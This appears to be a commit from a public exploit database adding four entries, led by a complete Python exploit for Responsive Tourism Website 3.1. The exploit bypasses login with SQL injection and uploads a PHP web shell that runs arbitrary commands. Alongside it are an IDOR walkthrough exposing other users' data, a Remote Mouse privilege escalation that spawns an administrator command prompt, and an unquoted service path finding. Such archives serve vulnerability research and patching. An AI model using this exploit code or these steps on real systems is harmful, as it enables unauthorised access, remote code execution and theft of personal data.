DB: 2021-06-23

4 changes to exploits/shellcodes ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated) Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR)
2021-06-23 05:01:58 +00:00 · 2021-06-23 05:01:58 +00:00 · d318d8a2c7
commit d318d8a2c7
parent 033645d201
5 changed files with 142 additions and 13 deletions
--- a/exploits/php/webapps/50049.py
+++ b/exploits/php/webapps/50049.py
@ -0,0 +1,66 @@
+# Exploit Title: Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 22.06.2021
+# Exploit Author: Tagoletta (Tağmaç)
+# Software Link: https://www.sourcecodester.com/php/14838/simple-responsive-tourism-website-using-php-free-source-code.html
+# Version: V 3.1
+# Tested on: MacOS & Windows
+
+import requests
+import random
+import string
+from bs4 import BeautifulSoup
+
+url = input("TARGET = ")
+
+if not url.startswith('http://') and not url.startswith('https://'):
+    url = "http://" + url
+if not url.endswith('/'):
+    url = url + "/"
+
+
+session = requests.Session()
+session.get(url + 'admin/login.php')
+
+print("- Bypassing login -")
+
+login_url = url + "classes/Login.php?f=login"
+login_data = {"username": "admin' or '1'='1'#", "password": "admin' or '1'='1'#"}
+session.post(login_url, cookies=session.cookies.get_dict(), data=login_data)
+
+print("- Protecting User -")
+
+protectSettings_url = url + 'admin/?page=user'
+protectSetting_html = session.get(protectSettings_url)
+protectSettings_parser = BeautifulSoup(protectSetting_html.text, 'html.parser')
+
+ids = protectSettings_parser.find('input', {'name':'id'}).get("value")
+firstname = protectSettings_parser.find('input', {'id':'firstname'}).get("value")
+lastname = protectSettings_parser.find('input', {'id':'lastname'}).get("value")
+username = protectSettings_parser.find('input', {'id':'username'}).get("value")
+
+print("User ID : " + ids)
+print("First Name : " + firstname)
+print("Last Name : " + lastname)
+print("Username : " + username)
+
+print("- OK -")
+
+let = string.ascii_lowercase
+shellname = ''.join(random.choice(let) for i in range(15))
+
+print("Shell uploading")
+
+upload_url = url + "classes/Users.php?f=save"
+upload_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7gB8BDj2OLQBJbBT", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
+upload_payload = "<?php if(isset($_GET['cmd'])){ echo '<b>Tagoletta</b><pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
+upload_data = "------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+"_Tagoletta.php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+ upload_payload +"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT--\r\n"
+upload = session.post(upload_url, headers=upload_headers, data=upload_data)
+
+if upload.status_code == 200:
+    print("- OK -")
+    req = session.get(url + "/admin/?page=user", headers=session.headers)
+    parser = BeautifulSoup(req.text, 'html.parser')
+    find_shell = parser.find('img', {'id':'cimg'})
+    print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
+else:
+    print("- NO :( -")
--- a/exploits/php/webapps/50050.txt
+++ b/exploits/php/webapps/50050.txt
@ -0,0 +1,25 @@
+# Exploit Title: Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR)
+# Date: 21/06/2021
+# Exploit Author: Pratik Khalane
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
+# Version: 1.0
+# Tested on: Windows 10 Pro
+
+
+Vulnerability Details
+======================
+
+Steps :
+
+
+1) Log in to the application with the given credentials
+
+Username: kwizera
+Password: 12345
+
+2) Navigate to Invoice and Click on Print Invoice.
+
+3)In /Invoice.php?id=3005, modify the id Parameter to View User details,
+Address,
+Payments, Phone number, and Email of other Users
--- a/exploits/windows/local/50047.txt
+++ b/exploits/windows/local/50047.txt
@ -1,19 +1,15 @@
 # Exploit Title: Remote Mouse GUI 3.008 - Local Privilege Escalation
-# Exploit Author: Salman Asad (@deathflash1411)
+# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)
 # Date: 17.06.2021
 # Version: Remote Mouse 3.008
 # Tested on: Windows 10 Pro Version 21H1
+# Reference: https://deathflash.ml/blog/remote-mouse-lpe

-# Note: Local/RDP access is required to exploit this vulnerability
+Steps to reproduce:

-This method is also known as Citrix Method (Insecure GUI App)
-After installation remote mouse runs as administrator and autostarts by default
-
-PoC:
-
-Open remote mouse from the system tray
-Go to Settings
-Click "Change..." in the "Image Transfer Folder" area
-Save As prompt will appear
-Enter "C:\Windows\System32\cmd.exe"
-Command Prompt is spawned with administrator privileges
+1. Open Remote Mouse from the system tray
+2. Go to "Settings"
+3. Click "Change..." in "Image Transfer Folder" section
+4. "Save As" prompt will appear
+5. Enter "C:\Windows\System32\cmd.exe" in the address bar
+6. A new command prompt is spawned with Administrator privileges
--- a/exploits/windows/local/50048.txt
+++ b/exploits/windows/local/50048.txt
@ -0,0 +1,39 @@
+# Exploit Title: ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path
+# Date: 2021-06-21
+# Exploit Author: Julio Aviña
+# Vendor Homepage: https://www.asus.com/
+# Software Link: https://dlcdnets.asus.com/pub/ASUS/LCD%20Monitors/MB16ACE/ASUS_DisplayWidget_3.4.0.036.exe.zip
+# Version: 3.4.0.036
+# Service File Version 1.0.0.1
+# Tested on: Windows 10 Pro x64 es 
+# Vulnerability Type: Unquoted Service Path
+
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%ASUSDisplayWidgetService%"' get displayname, pathname, startmode, startname
+
+DisplayName                                      PathName                                                                        StartMode  StartName
+ASUS DisplayWidget Service by Portrait Displays  C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe  Auto       LocalSystem
+
+# 2. To check service info:
+
+C:\>sc qc "ASUSDisplayWidgetService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ASUSDisplayWidgetService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : ASUS DisplayWidget Service by Portrait Displays
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# 3. Exploit:
+
+A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
+When restarting the service or the system, the inserted executable will run with elevated privileges.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11379,6 +11379,7 @@ id,file,description,date,author,type,platform,port
 50040,exploits/windows/local/50040.txt,"iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
 50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
 50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
+50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -44195,3 +44196,5 @@ id,file,description,date,author,type,platform,port
 50044,exploits/php/webapps/50044.txt,"Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)",2021-06-21,"Riadh Benlamine",webapps,php,
 50042,exploits/php/webapps/50042.py,"Websvn 2.6.0 - Remote Code Execution (Unauthenticated)",2021-06-21,g0ldm45k,webapps,php,
 50046,exploits/php/webapps/50046.txt,"Customer Relationship Management System (CRM) 1.0 - Remote Code Execution",2021-06-21,"Ishan Saha",webapps,php,
+50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php,
+50050,exploits/php/webapps/50050.txt,"Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR)",2021-06-22,"Pratik Khalane",webapps,php,